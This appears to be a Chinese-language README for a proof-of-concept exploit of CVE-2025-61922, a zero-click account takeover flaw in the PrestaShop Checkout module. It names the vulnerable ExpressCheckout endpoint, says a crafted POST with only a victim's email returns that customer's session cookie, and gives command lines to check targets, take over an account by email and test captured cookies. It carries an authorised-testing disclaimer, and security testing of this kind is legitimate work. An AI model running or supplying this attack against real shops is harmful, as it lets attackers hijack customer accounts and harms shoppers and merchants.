一个简单的教育性概念验证脚本,演示了 PrestaShop Checkout 模块中的零点击账户接管漏洞(CVE-2025-61922)。
⚠️ 法律与道德声明:请负责任地使用 此工具仅用于教育目的和授权安全测试。仅可对您拥有或已获得明确书面许可测试的系统使用。未经授权访问计算机系统是违法的。
该漏洞编号为 CVE-2025-61922,CVSS 评分为 9.1(严重),影响 PrestaShop Checkout 模块 低于 5.0.5 的版本。它允许未经身份验证的攻击者仅凭受害者的电子邮件地址即可以任意客户账户身份登录——这是一种真正的“零点击”攻击。
该脚本向易受攻击的端点发送一个特制的 POST 请求:
/module/ps_checkout/ExpressCheckout成功时,服务器将返回受害者账户的会话 Cookie,可用于劫持其会话。
CVE-2025-61922.py - 主漏洞利用脚本README.md - 本文档# Check if a target is vulnerable
python CVE-2025-61922.py check --url http://target-shop.com
# Exploit a specific email
python CVE-2025-61922.py takeover --url http://target-shop.com --email [email protected]
# Test captured cookies
python CVE-2025-61922.py test --url http://target-shop.com --cookies "PrestaShop-abc123=..."